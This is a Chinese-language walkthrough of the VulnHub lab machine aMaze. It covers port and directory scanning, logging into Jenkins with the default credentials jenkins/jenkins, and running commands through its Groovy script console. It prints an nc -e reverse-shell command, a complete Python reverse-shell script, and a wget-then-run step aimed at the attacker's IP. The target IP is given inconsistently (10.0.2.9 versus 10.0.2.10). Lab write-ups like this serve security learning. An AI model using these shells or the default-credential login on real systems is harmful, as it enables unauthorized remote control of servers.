Vulnhub靶机:aMaze

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:aMaze(10.0.2.9)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/amaze-1,573/

二、信息收集

使用nmap主机发现靶机ip10.0.2.10

使用nmap端口扫描发现靶机开放端口:21、22、80、8000

80端口使用dirsearch爆破目录,发现一个登录界面

8000端口使用dirsearch爆破目录,每爆破出什么来,打开网站是Jenkins中间件登录界面


三、漏洞利用

jenkins中间件的漏洞网上很多,但尝试了一些poc,都不行。后面尝试弱口令

jenkins/jenkins成功登录。

点击系统管理,下拉找到脚本控制台,点击脚本控制台,执行并打印系统命令

复制代码
println "whoami".execute().text

使用nc反弹shell成功,root权限

复制代码
println "nc -e /bin/bash 10.0.2.15 8888".execute().text

还可以使用python提权,将python脚本通过web上传到靶机,启动nc监听8888端口,并运行

python 复制代码
#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.15",8888));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
复制代码
#在靶机执行命令
println "wget http://10.0.2.15/shell.py".execute().text
println "python3 shell.py".execute().text

寻找不到flag

相关推荐
安全系统学习5 小时前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
聚铭网络10 小时前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全
GLAB-Mary11 小时前
AI会取代网络工程师吗?理解AI在网络安全中的角色
网络·人工智能·web安全
galaxylove14 小时前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全
mooyuan天天1 天前
DVWA靶场通关笔记-文件上传(Medium级别)
web安全·文件上传·文件上传漏洞·dvwa靶场·文件上传mime
速盾cdn1 天前
速盾:高防CDN还有哪些冷知识?
网络·web安全
m0_738120721 天前
玄机——某学校系统中挖矿病毒应急排查
网络·安全·web安全
浩浩测试一下10 天前
渗透测试指南(CS&&MSF):Windows 与 Linux 系统中的日志与文件痕迹清理
linux·运维·windows·安全·web安全·网络安全·系统安全
安全系统学习10 天前
【网络安全】DNS 域原理、危害及防御
算法·安全·web安全·网络安全·哈希算法
我看就这样吧11 天前
内网提权-脏牛提权(Metasploitable2)
web安全